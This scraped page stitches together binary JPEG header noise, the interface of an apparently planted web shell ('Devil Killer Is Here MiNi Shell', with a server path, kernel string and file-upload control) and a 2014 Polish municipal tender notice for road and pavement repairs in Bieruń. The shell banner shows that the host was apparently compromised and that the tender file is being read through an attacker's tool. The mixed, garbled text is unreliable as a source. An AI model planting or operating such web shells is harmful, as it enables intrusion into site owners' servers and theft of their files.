JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140221/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140221/35087-N-2014.html

<p class="kh_header"><b>Bieruń: REMONTY DRÓG, CHODNIKÓW I PLACÓW O NAWIERZCHNIACH INNYCH NIŻ ASFALTOWE ORAZ URZĄDZEŃ ODWADNIAJĄCYCH</b><br>
<b>Numer ogłoszenia: 35087 - 2014; data zamieszczenia: 21.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONTY DRÓG, CHODNIKÓW I PLACÓW O NAWIERZCHNIACH INNYCH NIŻ ASFALTOWE ORAZ URZĄDZEŃ ODWADNIAJĄCYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są remonty bieżące dróg, chodników, placów o nawierzchniach innych niż asfaltowe (z kostki lub płyt betonowych, tłuczniowe, z frezu asfaltowego, gruntowe)  oraz urządzeń odwadniających (kratki ściekowe, korytka ściekowe).

A. Zakres robót został określony  w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru   
    robót remontowych  i obejmuje:
1.	roboty rozbiórkowe chodników z płyt betonowych - 300m2 ;
2.	roboty rozbiórkowe obrzeży - 300 m;
3.	roboty rozbiórkowe krawężników  - 200 m;
4.	remonty cząstkowe chodników z płyt i kostki brukowej betonowej - 450 m2 ;
5.	montaż słupków aluminiowych/żeliwnych w nawierzchni z kostki brukowej (materiał inwestora) -15 szt.;
6.	wywóz gruzu na odległość do 5 km - 25 m3  i ziemi - 50 m3 ;
7.	korytowanie ręczne na głębokość 10 cm - 400 m2;
8.	koryta wykonywane mechanicznie na głębokość 20 cm - 200 m2;
9.	mechaniczne profilowanie i zagęszczenie podłoża przy użyciu walca - 10 000 m2 ;
10.	ręczne profilowanie i zagęszczenie podłoża - 300 m2;
11.	wyrównanie dróg frezem asfaltowym - 380 m3 , tłuczniem - 190 m3 ;
12.	wykonanie podbudowy tłuczniowej: grub. 20 cm- 100 m2 , 10 cm - 400 m2  ;
13.	wykonanie nowej nawierzchni chodników z kostki betonowej  - 400 m2 ;
14.	zabudowę krawężników betonowych na ławie - 200m i obrzeży - 200 m ;
15.	zabudowę betonowych korytek ściekowych na ławie betonowej - 50 m;
16.	mechaniczne ścinanie poboczy - 350 m2 ;
17.	humusowanie skarpz obsianiem trawą - 100 m2;
18.	regulację pionową studzienek dla urządzeń podziemnych - 20 szt. 

B. Zakres zamówienia obejmuje również:
1.	Wykonanie projektu tymczasowej organizacji ruchu, uzyskanie uzgodnień i zatwierdzeń w/w projektu (1 egz. zatwierdzonego projektu należy przekazać zamawiającemu przed odbiorem oznakowania).
2.	Prawidłowe oznakowanie miejsca robót wg w/w projektu tymczasowej organizacji ruchu oraz zapewnienie odpowiednich warunków bezpieczeństwa na drogach w trakcie wykonywania robót.
3.	Utrzymanie w należytej czystości dróg z których będzie korzystał wykonawca w czasie realizacji zadania.
4.	Naprawę szkód wyrządzonych osobom trzecim w toku realizacji robót.
5.	Wykonawca zobowiązany jest do przystąpienia do robót związanych z remontami najpóźniej do 3 dni od dnia zgłoszenia (faksem, drogą elektroniczną lub telefoniczną) przez zamawiającego konieczności wykonania tych robót.  

C.	Informacje uzupełniające 
1.	Jeżeli w specyfikacji technicznej wykonania i odbioru robót budowlanych (STWiORB)  oraz SIWZ określone zostały materiały i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to, że nie można zastosować materiałów i urządzeń równoważnych, lecz o nie gorszych parametrach i spełniających wymogi podane w projekcie i STWiORB . Podane w opisach nazwy własne nie mają na celu naruszenia art.29 i 7 ustawy pzp, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. Zamawiający dopuszcza rozwiązania równoważne, pod warunkiem spełnienia tego samego poziomu jakościowego, technologicznego i estetycznego. Zabudowane i dostarczone materiały budowlane muszą posiadać wszystkie wymagane Prawem budowlanym i polskimi normami, przenoszącymi zharmonizowane normy europejskie, atesty, certyfikaty i aprobaty techniczne. W świetle zapisów Prawa zamówień publicznych (art.30) należy stosować wyroby budowlane spełniające wymagania Polskich Norm przenoszących Normy Europejskie PN-EN (normy zharmonizowane). W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy uwzględnia się w kolejności:
- europejskie aprobaty techniczne;
- wspólne specyfikacje techniczne;
- normy międzynarodowe;
- inne techniczne systemy odniesienia ustanowione przez europejskie organy normalizacyjne.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy oraz aprobat, specyfikacji, norm i systemów, o których mowa w art. 30 ust. 2  ustawy pzp, uwzględnia się w kolejności:
- Polskie Normy;
- polskie aprobaty techniczne;
- polskie specyfikacje techniczne.
Zgodnie z art. 8 ust. 5  Ustawy o systemie oceny zgodności (tekst jednolity Dz. U. z 2010 r. Nr 138 poz.935 z późniejszymi zmianami) :zabrania się wprowadzania do obrotu lub oddawania do użytku wyrobu nieposiadającego oznakowania zgodności, jeżeli wyrób ten podlega takiemu oznakowaniu.
W związku z powyższym zamawiający będzie wymagał od  wykonawcy stosownego oświadczenia             w stosunku do wyrobów, które podlegają takiemu oznakowaniu. 
Przed wbudowaniem wykonawca przedstawi świadectwa dopuszczenia do stosowania materiałów i wyrobów do zabudowy - do akceptacji  przez inspektora nadzoru.
2.	Odpowiedzialność wykonawcy z tytułu gwarancji za wady w odniesieniu do całego przedmiotu    
          zamówienia ma obejmować okres minimum 12 miesięcy, licząc od daty odbioru końcowego    
          przedmiotu zamówienia.
3.	Zamawiający nie przewiduje: zaliczek na poczet wykonania zamówienia, aukcji elektronicznej, zawarcia umowy ramowej, zamówień uzupełniających, dynamicznego systemu zakupów w rozumieniu ustawy oraz stosowania wymagań określonych w art.29 ust.4 ustawy.
	Zamawiający nie dopuszcza składania ofert częściowych i wariantowych.   
4.  Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia. 
5.  W kosztorysie ofertowym w kosztach pośrednich należy uwzględnić koszty oznakowania prowadzonych robót drogowych wraz z dostawą znaków, wynikających  z organizacji ruchu  na czas prowadzenia robót. 

6.  Powyższe roboty objęte są podatkiem VAT w wysokości 23%. 
D. Kody Wspólnego Słownika Zamówień (CPV) :
           45233140-2  Roboty drogowe,  
           45233200-1  Roboty w zakresie różnych  nawierzchni,     
           45232451-8  Roboty odwadniające i nawierzchniowe.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.00-1, 45.23.24.51-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zasady wnoszenia wadium
Wadium w wysokości  4 000,00 zł (słownie: cztery tysiące zł 00/100) musi być wniesione                     w terminie, który został podany w SIWZ  punkcie III.3 -Terminy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego w BS O/Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją:
Wadium - nr sprawy: ZP.271.6.2014 Przetarg nieograniczony na wybór wykonawcy zamówienia 
Remonty dróg, chodników i placów o nawierzchniach innych niż asfaltowe oraz urządzeń odwadniających.
Termin - wniesienie wadium w pieniądzu - oznacza uznanie kwoty wadium, wpłaconego przelewem, na rachunku zamawiającego nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu              (I piętro, pokój nr 8, segment B) nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert. 
Termin ważności wadium wniesionego w innej formie niż pieniądz musi obejmować okres nie krótszy niż termin związania ofertą tj. nieprzerwanie obejmujący okres 30 dni włącznie z dniem wyznaczonym do składania ofert. 
W przypadku przesyłania wadium pocztą, należy na opakowaniu umieścić zapis:
Wadium do przetargu (nazwa postępowania). 
Należy przekazać do kasy Urzędu Miejskiego w Bieruniu, 43-150 Bieruń, Rynek 14 do godz.10:00 (wpisać dzień składania ofert).
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                    z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)	w gwarancjach ubezpieczeniowych,
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 poz.1158                 z późniejszymi zmianami).
Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz                      z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się o udzielenie nin. zamówienia, zaleca się  wskazać informacyjnie wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                         z art. 24 ust. 2 pkt 2 ustawy pzp, a jego oferta zostanie uznana za odrzuconą.
2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy pzp wraz                      z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
1)	Zgodnie z art. 46 ust.1 ustawy pzp, zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem  wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
2)	Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
3)	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.


4)	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podst. art. 46 ust.1 ustawy pzp , jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wadium zostanie wniesione w terminie określonym przez zamawiającego.

3. Utrata wadium
Zgodnie z zastrzeżeniem art.46 ust.4a ustawy pzp zamawiający zatrzymuje wadium wraz                                  z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Ponadto zgodnie z art.46 ust.5 ustawy pzp zamawiający zatrzymuje wadium wraz z odsetkami, jeżeliby wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych                    w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)  zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy spełniają warunki dotyczące:
Posiadania uprawnień do wykonywania działalności lub czynności, jeżeli ustawy nakładają   
 obowiązek posiadania takich uprawnień.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę: 
- oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy spełniają warunki dotyczące:
Posiadania wiedzy i doświadczenia: 
     Wykonali w sposób należyty, zgodnie ze sztuką budowlaną i prawidłowo ukończyli w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli  okres prowadzonej działalności      jest - to w tym okresie, roboty  remontowe lub inwestycyjne  w zakresie budowy lub remontu dróg, chodników lub placów o łącznej wartości brutto min. 300 000 zł.     
      Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie 
      przedłożonego przez wykonawcę:
 -   oświadczenia (zgodnie z art.22 ust.1 pkt 2 ustawy pzp);
-  dokumentów: wykazu  robót budowlanych (roboty  remontowe lub inwestycyjne w zakresie budowy , przebudowy, odbudowy lub remontu dróg, chodników lub placów o łącznej wartości brutto min. 300 000,00 zł) wykonanych w okresie  ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności był krótszy to w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót , określających, czy roboty te zostały wykonane należycie  oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Dowodami są:
1.	poświadczenie,
2.	inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie wykazać poświadczenia, o którym mowa wyżej.
W przypadku gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie (wymaganych robót), zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa wyżej.
Przez wykonali zamawiający rozumie, że roboty  zostały zakończone i odebrane protokołami końcowymi odbioru robót w ostatnich pięciu latach przed upływem terminu składania ofert, a jeżeli okres jest krótszy - w tym okresie.
Zamawiający uzna za spełnienie wymaganego warunku również wykonanie jednej wymaganej roboty o wartości  min. 300 000,00 zł.
 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena  warunku  
nastąpi łącznie (np. jeden z podmiotów wchodzący w skład podmiotu wspólnego wykonał wymagane roboty na kwotę brutto 300 000,00 zł lub jeden z podmiotów wchodzący w skład podmiotu wspólnego wykonał wymagane roboty na kwotę brutto 100 000,00zł, a drugi z podmiotów wchodzących w skład podmiotu występującego wspólnie wykonał wymagane roboty za kwotę brutto 200 000,00 zł).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy spełniają warunki dotyczące:
Dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie
przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy spełniają warunki dotyczące:
Dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia.
    Dysponują co najmniej jedną osobą posiadającą uprawnienia budowlane bez ograniczeń w zakresie kierowania robotami drogowymi bez ograniczeń, która będzie uczestniczyć w wykonaniu zamówienia. 
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
    przedłożonego przez wykonawcę:
-	oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp);
-	dokumentu: wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi   wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia (uprawnienia budowlane w zakresie kierowania robotami drogowymi bez ograniczeń), a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.  
    W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że 
    warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy spełniają warunki dotyczące:
Sytuacji ekonomicznej i finansowej.
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie          
    przedłożonego przez wykonawcę: 
    - oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A. Każdy wykonawca przystępujący do postępowania złoży następujące oświadczenie z art. 22 ust. 1 ustawy pzp, że spełnia warunki dotyczące:
1.	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
2.	Posiadania wiedzy i doświadczenia.
3.	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
4.	Sytuacji ekonomicznej i finansowej.

Oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione 
do zaciągania zobowiązań w imieniu wykonawcy. 
Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii. 
B. 1. Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
dostarcza oświadczenia i dokumenty wymienione w SIWZ pkt  VA - Lista wymaganych oświadczeń oraz w SIWZ pkt  VB - Lista wymaganych dokumentów. Zamiast dokumentów, o których mowa w  ppkt 3  Listy wymaganych dokumentów, przedstawia dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem, przed upływem terminu składania ofert.
